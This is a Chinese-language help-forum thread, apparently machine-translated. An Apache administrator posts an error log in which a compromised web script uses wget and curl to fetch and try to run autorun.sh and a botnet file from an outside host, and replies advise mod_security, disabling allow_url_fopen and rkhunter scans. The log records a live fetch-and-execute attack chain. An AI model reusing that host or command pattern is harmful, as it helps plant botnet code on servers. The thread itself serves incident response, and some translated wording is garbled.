我面临着与Apache的问题。 以下日志显示在error_log文件中。
--15:01:26-- http://bandits.ucoz.hu/autorun.sh Resolving bandits.ucoz.hu... 193.109.247.50 Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 396 [application/octet-stream] Saving to: `autorun.sh' 0K 100% 51.6M=0s 15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396] sh: fetch: command not found % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 396 100 396 0 0 70387 0 --:--:-- --:--:-- --:--:-- 0 connected. HTTP request sent, awaiting response... 200 OK Length: 28762 (28K) [text/plain] Saving to: `b0t3.txt' 0K .......... .......... ........ 100% 8.75M=0.003s 15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762] sh: fetch: command not found % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 28762 100 28762 0 0 3434k 0 --:--:-- --:--:-- --:--:-- 13.1M sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied sh: /usr/bin/perl: Permission denied --15:01:27-- http://bandits.ucoz.hu/autorun.sh Resolving bandits.ucoz.hu... 193.109.247.50 Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 396 [application/octet-stream] Saving to: `autorun.sh' 0K 100% 31.8M=0s 15:01:27 (31.8 MB/s) - `autorun.sh' saved [396/396] sh: fetch: command not found % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 396 100 396 0 0 48768 0 --:--:-- --:--:-- --:--:-- 0 我怎样才能防止这个问题?
似乎有人试图使用您的网页,可能是脆弱的下载并运行Perl脚本。 – 试图禁止执行所有解释器(perl,phyton,curl,c等)。
我认为它可能是apache + php,如果是的话,你可能会被禁用:allow_url_fopen =closures,通过PHP禁用下载。
添加httpd mod_security
你有一个脚本伸手去抓取看起来像僵尸networking脚本的东西,试图在本地保存和执行。 这是不正确的,因为它是在错误文件中。
找出脚本正在使用什么来检索文件[如果可以的话,阻止]
用rkhunter下载和扫描
-Sean